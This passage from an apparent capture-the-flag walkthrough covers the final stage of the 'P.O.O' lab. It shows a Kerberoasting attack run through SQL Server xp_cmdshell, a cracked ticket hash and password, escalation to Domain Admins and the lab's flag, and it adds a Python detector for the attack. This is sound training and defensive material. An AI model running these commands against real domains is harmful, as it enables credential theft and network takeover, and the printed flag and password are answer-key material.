*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
compatibility\administrator
# flag.txt is found in \Administrator\Desktop
We now have administrator rights on one host, and it is in the intranet.poo domain.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> systeminfo
Host Name: COMPATIBILITY
OS Name: Microsoft Windows Server 2019 Standard
Domain: intranet.poo
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4533013
[02]: KB4516115
[03]: KB4523204
[04]: KB4530715
So the first thing is to enumerate domain hosts, users and so on, but none of that works, because a local user cannot send requests to the domain.
The SQL Server account, however, can stand in: service accounts automatically impersonate the computer account, and the computer account is a domain member, essentially a special type of user account.
From 内网渗透 | SPN 与 Kerberoast 攻击讲解 I learned about the Kerberos protocol and SPNs; further down it has a GetUserSPNs.ps1 script. Uploading it with evil-winrm seemed unreliable, and when I came back to reproduce it would not succeed at all. Since this is a local user, it naturally cannot query domain information, so it has to be run in the SQL shell obtained earlier.
*Evil-WinRM* PS C:\programdata> Import-Module .\GetUserSPNs.ps1
Exception calling "FindAllGlobalCatalogs" with "0" argument(s): "An operations error occurred.
"
At C:\programdata\GetUserSPNs.ps1:30 char:3
+ $CurrentGCs = $ForestInfo.FindAllGlobalCatalogs()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : ActiveDirectoryOperationException
No Global Catalogs Found!
Then the PowerView.ps1 script, probably because it is so old, was blocked by Windows Defender; from Powershell Get-Random with dates blocked with "this script contains malicious content" it seems the only options are a Defender update or an allow-list entry.
Fortunately Invoke-Kerberoast.ps1 still works, and it can export the tickets directly in hashcat format. It failed when run from evil-winrm but works from the SQL Server shell, perhaps because evil-winrm has insufficient privileges? But that user is already compatibility\administrator; maybe it lacks domain privileges?
SQL> xp_cmdshell "powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat"
output
--------------------------------------------------------------------
TicketByteHexStream : # omitted
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
TicketByteHexStream : # omitted
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
We got tickets for two users, p00_hr and p00_adm. Copying straight from the shell brings lots of whitespace, so write a small script to strip it. Since the hashcat ticket contains $, wrap it in single quotes; double quotes would let the shell expand the string.
#!/bin/bash
# Strip all whitespace (including line breaks) from the first argument and print it on one line.
# "$1" is quoted and printf gets a fixed '%s' format, so '$' and other characters in the
# ticket are neither expanded by the shell nor interpreted as printf directives.
printf '%s\n' "$(printf '%s' "$1" | tr -d '[:space:]')"
└─$ ./strip_blank.sh '<p00_adm ticket pasted from the shell>'
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$2D174A783C330A55AB2AF8E5733E074F$282865F55044416D0B8215DEBA1C8702368E0ED12620ABEFD419A1DE6DEB0465B85BB9D7F643577AE16BD9E8404F49B65A8E9F172AC44A875ED202714C9F63732E4D909833C8363492525FD9F35700804B2187291ED14B39CC82C3D1F8549AFD8D9FA4FA83AC1F2164F064C243E0A3FF0469ECCD2DC874B6C16DE5B530BD97571A669A7AA4BDA170E80859FDC66C0E922ADA65CBC66B78A4FA66F2E59E2EB8B5F806EE7CCB5ADA02391CE93F5C9DB7E91D41247E08D9C8977ADCC3841400852BC5E7C02AB1A6129710499007941B8541AA9108BAC770C04CB5EEF42BF39E5B46FFE716DA4A00AFADA2D47D24EF737D66CD1895C68E68299B75820491203D412D6B1F7BB6969F6D789F7764A183EDB4E97C731DE045154EDC76427A3CAA6C46FFB2203E64C2F0D45303B38C367E3906A612D5A66DCB14284B2D39CC7F2AB07E212AB60B1F18FB9880E4F43CA64E6FF8F2DA27617A1C262660140915B9CA7A6A344A3F0FB347006F40D88B29A006358A755748ADE2D606B872394C9826099F09FECDDF9B3969474632BC635AA039AF3CAD02D60C59A27765DAB66F0EA12A740F9F53F459B3AD866B24A7FBAF17E73500C6A9F5F6E57849BED1570AD8D4070573BD21DBC098D830ECEE9047BE0F6318CF930E4156C1BFD6813FF0CD1D77DE081C3012B579659CF698B23C50E50DC44D09135C54540EF1A33A158E428F4D56890025CA3A56E615AC1C16175974C2B96ECAE9B340463EE71836D0F0E0CF08178E3A386F9F7DB3398F811C0D7A8BB352E9E7FC1D4EB5275A9C3605DCB9285B95E1CF7C45A2BB757649B3FF80E836118B60541CE67CC72B0A74B50E9383B211B039A95DAD66D70E885B2D805BF68A3452306189433D37FCFD9E7804F8F7E3B98A2D8AC12A436BD7A1B4392D97EECCE519940DC9886446498D8459D279836310C0BEFBE85A2CC5146A2251D3A71EB198DAE7275A14F686ADAE3199FCB766C955A093F3620CE8F0F6CAA84307D827BFD805E6FC3939EEB2458AEF8685E9347DED0EF47926CED7F0402C75BD6CE84A88BDE1C4BFE245F80923F2F8AFF1ACA9AB30F205FBB04BF2F49D6D112220486E55D416D0943B3B23D4F049C7207B93ADED3CF83F4679B061CD6071C35DF5751272F1025A97908D86AB91F4F84CDA4BDD250F31EC72CB2A7C1EA7E0A1D7C5EDB37A5904B59EE30882D0C7AC60042439303733A1D266A9191F60DC880AF13865A5592EB309786AE264A5CCEE57F3963FC42C724AD9202871D07AD11E17D1E57297129D5DB09497ADA8C15A6A4F859C5B27AFB32574A779BF724F316F735112556CEF32BD46B8010E0E160DA5EA81281088EB0889406CC790DBA8442219FB332963D6E428E7990C7961283C5344ECCD81442EEC5DEB3B740CEA3FECA73A70B87044DF2104B6DDC55605DEBD4421FBE970539B526CDDFFBCBF0C65E36409700C46BA547707BCECF8FF4D5600485
└─$ hashcat -m 13100 hash.txt /usr/share/seclists/Passwords/Keyboard-Combinations.txt --force
# The password is ZQ!5t4r
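From the defender's side, the request the post just made leaves a distinctive trace: Event ID 4769 (a Kerberos service ticket was requested) on the domain controller with RC4 encryption (TicketEncryptionType 0x17, the 23 in the $krb5tgs$23$ hash prefix) for a service that runs under a user account rather than a machine account, usually several such requests from one requester within seconds. The following Python is an added example (my own, not from the post) that runs that logic over constructed event records; the field names match the EventData fields of 4769, while the records themselves, the time window and the threshold are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed 4769 records (field names follow the event's EventData).  Two RC4
# requests for user-account SPNs from one requester, one AES request, and one
# request for a machine-account service.
EVENTS = [
    {"TimeCreated": "2022-06-22T18:00:01", "TargetUserName": "COMPATIBILITY$@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11", "Status": "0x0"},
    {"TimeCreated": "2022-06-22T18:00:02", "TargetUserName": "COMPATIBILITY$@INTRANET.POO",
     "ServiceName": "p00_adm", "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.13.38.11", "Status": "0x0"},
    {"TimeCreated": "2022-06-22T18:05:00", "TargetUserName": "alice@INTRANET.POO",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.13.38.50", "Status": "0x0"},
    {"TimeCreated": "2022-06-22T18:06:00", "TargetUserName": "bob@INTRANET.POO",
     "ServiceName": "p00_hr", "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.13.38.51", "Status": "0x0"},
]

RC4_HMAC = "0x17"


def is_roast_candidate(event):
    """A successful RC4 service-ticket request for a non-machine, non-krbtgt service."""
    service = event["ServiceName"]
    return (event["Status"] == "0x0"
            and event["TicketEncryptionType"].lower() == RC4_HMAC
            and not service.endswith("$")
            and service.lower() != "krbtgt")


def find_kerberoast(events, window=timedelta(minutes=5), min_services=2):
    """Group candidate events by requester and flag bursts of distinct services.

    Returns a dict (requester, source IP) -> sorted list of service names
    requested with RC4 within WINDOW, for requesters that hit at least
    MIN_SERVICES distinct services in one window.
    """
    by_requester = defaultdict(list)
    for e in events:
        if is_roast_candidate(e):
            ts = datetime.fromisoformat(e["TimeCreated"])
            by_requester[(e["TargetUserName"], e["IpAddress"])].append((ts, e["ServiceName"]))
    alerts = {}
    for requester, reqs in by_requester.items():
        reqs.sort()
        # sliding window over the sorted timestamps
        for i, (t0, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                alerts[requester] = sorted(services)
                break
    return alerts


if __name__ == "__main__":
    for (user, ip), services in find_kerberoast(EVENTS).items():
        print("possible Kerberoasting by %s from %s: %s" % (user, ip, ", ".join(services)))
```

The requester in the constructed records is the machine account, which is what the post's own explanation predicts when the request is issued from the SQL Server service; the AES request for the same SPN is left alone, which is also the mitigation hint: service accounts with AES-only keys (and long random passwords) do not yield RC4 tickets to crack.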
Next, add p00_adm to the Domain Admins group:
*Evil-WinRM* PS C:\programdata> $pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
*Evil-WinRM* PS C:\programdata> Add-ADGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
└─$ evil-winrm -i compatibility -u p00_adm -p 'ZQ!5t4r'
*Evil-WinRM* PS C:\Users\p00_adm\Documents> net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
The command completed successfully.
*Evil-WinRM* PS C:\Users\p00_adm\Documents> dir \\DC.intranet.poo\c$\users\
Directory: \\DC.intranet.poo\c$\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/15/2018 1:20 AM Administrator
d----- 3/15/2018 12:38 AM mr3ks
d----- 6/22/2022 5:21 PM p00_adm
d-r--- 11/21/2016 3:24 AM Public
*Evil-WinRM* PS C:\Users\p00_adm\Documents> type \\DC.intranet.poo\c$\users\mr3ks\desktop\flag.txt
POO{1196ef8bc523f084ad1732a38a0851d6}
With that, P.O.O is finally done. I leaned on several walkthroughs and learned many things I didn't know before.
Recon: directory enumeration, exploiting the IIS short-name vulnerability.
Huh?!: SQL Server privilege escalation through a misconfigured Linked Database.
BackTrack: reading the IIS server's sensitive file C:\inetpub\wwwroot\web.config; when SQL Server runs an external script engine it executes as another user, which gave us permission to read web.config.
Foothold: some services are not only on IPv4 addresses but may be on IPv6; beyond the TCP/UDP distinction, services on IPv6 sometimes need checking too.
p00ned: domain privilege escalation; obtain the password from a Kerberos ticket, elevate the user to Domain Admin, and then access the domain controller.